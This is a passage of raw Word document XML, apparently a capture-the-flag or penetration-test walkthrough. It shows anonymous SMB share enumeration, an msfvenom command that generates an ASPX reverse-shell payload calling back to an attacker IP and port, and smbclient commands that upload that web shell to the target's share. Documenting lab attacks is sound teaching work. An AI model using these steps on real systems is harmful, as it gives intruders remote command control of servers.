                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1047115" y="5427980"/>
                          <a:ext cx="5505450" cy="147637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55pt;margin-top:8.65pt;height:116.25pt;width:433.5pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJADuZyfNkAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBCFdyT+g3VIbK3t0kAa4nQIYkAgIQoL2zU2SSC2&#10;I9tJyr/nmGA8vU/vfVfuT3Zgswmx906BXAtgxjVe965V8PZ6v8qBxYRO4+CdUfBtIuyr87MSC+0X&#10;92LmQ2oZlbhYoIIupbHgPDadsRjXfjSOsg8fLCY6Q8t1wIXK7cA3Qlxzi72jhQ5HU3em+TpMVsF7&#10;9smf+3rB6enh7jGbgxf11it1eSHFLbBkTukPhl99UoeKnI5+cjqyQcFKZpJQCm6ugBGQZ3IH7Khg&#10;s93lwKuS/3+h+gFQSwMEFAAAAAgAh07iQOuVkDVrAgAA3QQAAA4AAABkcnMvZTJvRG9jLnhtbK1U&#10;TU8bMRC9V+p/sHwvm4RdAhEbFBFRVUIFQaueHa83a8lftZ1s6K/vs3eBlPbAoTk4M57ZN57nN768&#10;OmhF9sIHaU1NpycTSoThtpFmW9Pv324+nVMSIjMNU9aImj6JQK+WHz9c9m4hZrazqhGeAMSERe9q&#10;2sXoFkUReCc0CyfWCYNga71mEa7fFo1nPdC1KmaTyVnRW984b7kIAbvrIUhHRP8eQNu2kou15Tst&#10;TBxQvVAsoqXQSRfoMp+2bQWPd20bRCSqpug05hVFYG/SWiwv2WLrmeskH4/A3nOENz1pJg2KvkCt&#10;WWRk5+VfUFpyb4Nt4wm3uhgayYygi+nkDTePHXMi9wKqg3shPfw/WP51f++JbGp6WlFimMaNP4A1&#10;ZrZKEOyBoN6FBfIe3b0fvQAzdXtovU7/6IMcIKZJOZ9OgfNU06qczS/OR4LFIRKOhKqaVGUF7jky&#10;puX87HSeKxSvUM6H+FlYTZJRU4+zZGLZ/jZElEfqc0qqbOyNVCrfojKkB+psPkkFGKTZQhIwtUN7&#10;wWwpYWoLzfPoM2SwSjbp8wQU/HZzrTzZs6SU/Eu9o9wfaan2moVuyMuhQUNaRoyFkrqm58dfKwOQ&#10;xODAWbI2tnkC6d4OagyO30jA3rIQ75mH/HB+DGi8w9Iqi6bsaFHSWf/rX/spH6pAlJIeckbDP3fM&#10;C0rUFwO9XEzLErAxO2U1n8Hxx5HNccTs9LUFD1M8BY5nM+VH9Wy23uofmONVqooQMxy1B2pH5zoO&#10;Y4aXgIvVKqdB847FW/PoeAIfLnC1i7aV+W5f2RlJg+rzHYwTmsbq2M9Zr6/S8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O5nJ82QAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54&#10;bWxQSwECFAAUAAAACACHTuJA65WQNWsCAADdBAAADgAAAAAAAAABACAAAAAoAQAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwUGAAAAAAYABgBZAQAABQYAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36DF7C">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The command above lists available network shares in the remote windows server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA31CA">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#smbclient is the utility that is used to talk to SMB servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE89B4F">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#-L is the listing flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7032F1">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#-N instructs for access with no password prompts i.e. as an anonymous user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDC51E">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#--option='client min protocol=NT1' is a compatibility override where the security standards are lowered to SMBv1/NT1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F72687C">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B83C92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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="1349375"/>
            <wp:effectExtent l="0" t="0" r="1016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690" cy="1349375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F6E8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Generating the reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD9B13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260F7964">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.128.54 LPORT=4444 -f aspx -o shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6B6BAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0897B4C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The above command generates a malicious web shell payload that targets Windows servers using the ASP.NET framework. If it is successfully uploaded, an attacker is connected to the server from their machine and have remote command line control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615C6215">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>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-163195</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6200775" cy="1933575"/>
                <wp:effectExtent l="6350" t="6350" r="22225" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="36" name="Rectangle 36"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="979805" y="1754505"/>
                          <a:ext cx="6200775" cy="193357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5pt;margin-top:11pt;height:152.25pt;width:488.25pt;z-index:251660288;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJASWhZIdgAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBCFdyT+g3VIbK1dgwuEOB2CGBBIiMLCdo1NEojt&#10;yHaS8u85JhhP9/Te95W7oxvYbGPqg9ewWQtg1jfB9L7V8PZ6v7oGljJ6g0PwVsO3TbCrTk9KLExY&#10;/Iud97llVOJTgRq6nMeC89R01mFah9F6+n2E6DDTGVtuIi5U7gYuhdhyh72nhQ5HW3e2+dpPTsO7&#10;+uTPfb3g9PRw96jmGER9GbQ+P9uIW2DZHvNfGH7xCR0qYjqEyZvEBg0rqa4oqkFKcqLAjRLkctBw&#10;IbcKeFXy/wrVD1BLAwQUAAAACACHTuJAEeageGgCAADcBAAADgAAAGRycy9lMm9Eb2MueG1srVTL&#10;btswELwX6D8QvDeyHTuOjciBESNFgaAxkhY90xQlEeCrJG05/foOKSVx0x5yqA/yrnY1yxkOeXV9&#10;1IochA/SmpKOz0aUCMNtJU1T0u/fbj9dUhIiMxVT1oiSPolAr1cfP1x1bikmtrWqEp4AxIRl50ra&#10;xuiWRRF4KzQLZ9YJg2JtvWYRqW+KyrMO6FoVk9Hoouisr5y3XISAt5u+SAdE/x5AW9eSi43ley1M&#10;7FG9UCyCUmilC3SVV1vXgsf7ug4iElVSMI35iSGId+lZrK7YsvHMtZIPS2DvWcIbTppJg6EvUBsW&#10;Gdl7+ReUltzbYOt4xq0ueiJZEbAYj95o89gyJzIXSB3ci+jh/8Hyr4etJ7Iq6fkFJYZp7PgDVGOm&#10;UYLgHQTqXFii79Ft/ZAFhIntsfY6/YMHOZZ0MV9cjmaUPMFX89l0hjjrK46RcNQvsP/zORp46lic&#10;n8+QoKN4RXI+xM/CapKCknosJevKDnch9q3PLWmwsbdSqTxEGdIBdTIfYW85gzNrOAKhdmAXTEMJ&#10;Uw0sz6PPkMEqWaXPE1Dwze5GeXJgySj5N6zsj7Y0e8NC2/flUk9Ry4hToaQu6eXp18qAXhKwlyxF&#10;O1s9QXNvezMGx28lYO9YiFvm4T6sH+cz3uNRKwtSdogoaa3/9a/3qR+mQJWSDm4G4Z975gUl6ouB&#10;XRbj6TTZPyfT2XyCxJ9WdqcVs9c3FjqMcRM4nsPUH9VzWHurf+AYr9NUlJjhmN1LOyQ3sT9luAi4&#10;WK9zGyzvWLwzj44n8H4D1/toa5n39lWdQTSYPrtjOKDpVJ3muev1Ulr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loWSHYAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBL&#10;AQIUABQAAAAIAIdO4kAR5qB4aAIAANwEAAAOAAAAAAAAAAEAIAAAACcBAABkcnMvZTJvRG9jLnht&#10;bFBLBQYAAAAABgAGAFkBAAABBgAAAAA=&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB949D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#msfvenom is a payload generator utility that is of the Metasploit framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD450BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-p windows/x64/shell_reverse_tcp specifies the payload type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F45059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#LHOST=192.168.128.54 specifies the attacker's IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFB5FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">#LPORT=4444 is the network port of the attackers machine and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>also the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> default placeholder port used by Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0246422E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-f aspx This is the output format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955CF1B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-o shell.aspx specifies the output filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439A7705">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-p is the flag for payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C36D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-f flag for format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6448F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#-o is the flag for output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DFAB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A70591">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1271D2D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Uploading payload via SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E39CAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5DA07A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127A2466">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>smbclient //10.49.167.173/nt4wrksv -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5220C99F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>smb: \&gt; put shell.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413DD335">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>smb: \&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22407E4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-106045</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5200650" cy="857250"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="37" name="Rectangle 37"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1036955" y="5114925"/>
                          <a:ext cx="5200650" cy="8572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35pt;margin-top:13.4pt;height:67.5pt;width:409.5pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAj6gifdgAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQU+EMBCF7yb+h2ZMvO22oIsEKXvAeDCaGFcv3mZhBJS2&#10;pC2w/nvHkx4n8+W975X7kxnFQj4MzmpItgoE2ca1g+00vL3eb3IQIaJtcXSWNHxTgH11flZi0brV&#10;vtByiJ3gEBsK1NDHOBVShqYng2HrJrL8+3DeYOTTd7L1uHK4GWWqVCYNDpYbepyo7qn5OsxGw/vu&#10;Uz4P9Yrz08Pd427xTtXXTuvLi0Tdgoh0in8w/OqzOlTsdHSzbYMYNWyS7IZRDWnGExjIVXoF4shk&#10;luQgq1L+n1D9AFBLAwQUAAAACACHTuJAMfsoGmcCAADcBAAADgAAAGRycy9lMm9Eb2MueG1srVTL&#10;btswELwX6D8QvDeyHSsPI3JgxEhRIGiMpEXPNEVJBPgqSVtOv75DSknctIcc6gO95C6HO6Mhr64P&#10;WpG98EFaU9HpyYQSYbitpWkr+v3b7acLSkJkpmbKGlHRJxHo9fLjh6veLcTMdlbVwhOAmLDoXUW7&#10;GN2iKALvhGbhxDphkGys1yxi6tui9qwHulbFbDI5K3rra+ctFyFgdT0k6Yjo3wNom0ZysbZ8p4WJ&#10;A6oXikVQCp10gS5zt00jeLxvmiAiURUF05hHHIJ4m8ZiecUWrWeuk3xsgb2nhTecNJMGh75ArVlk&#10;ZOflX1Bacm+DbeIJt7oYiGRFwGI6eaPNY8ecyFwgdXAvoof/B8u/7jeeyLqip+eUGKbxxR+gGjOt&#10;EgRrEKh3YYG6R7fx4ywgTGwPjdfpHzzIAWaanJ5dliUlTxUtp9P55awcBBaHSDgKymSAEtpzVFyU&#10;5zPEgCxekZwP8bOwmqSgoh6tZF3Z/i7EofS5JB1s7K1UCutsoQzp0cLsfJLwGZzZwBEItQO7YFpK&#10;mGpheR59hgxWyTptT7uDb7c3ypM9S0bJv7GzP8rS2WsWuqEupwaGWkbcCiU1eB3vVgb0koCDZCna&#10;2voJmns7mDE4fisBe8dC3DAP96F/3M94j6FRFqTsGFHSWf/rX+upHqZAlpIebgbhnzvmBSXqi4Fd&#10;LqfzOWBjnswhPCb+OLM9zpidvrHQYYqXwPEcpvqonsPGW/0D13iVTkWKGY6zB2nHyU0cbhkeAi5W&#10;q1wGyzsW78yj4wl8+ICrXbSNzN/2VZ1RNJg+u2O8oOlWHc9z1eujt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j6gifdgAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQDH7KBpnAgAA3AQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1s&#10;UEsFBgAAAAAGAAYAWQEAAAAGAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E2E52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#smbclient //10.49.167.173/nt4wrksv -N establishes anonymous unauthenticated connection to the shared folder in the target server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388D41F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>#smb: \&gt; put shell.aspx uploads the payload file to the shared folder server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F6EA58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
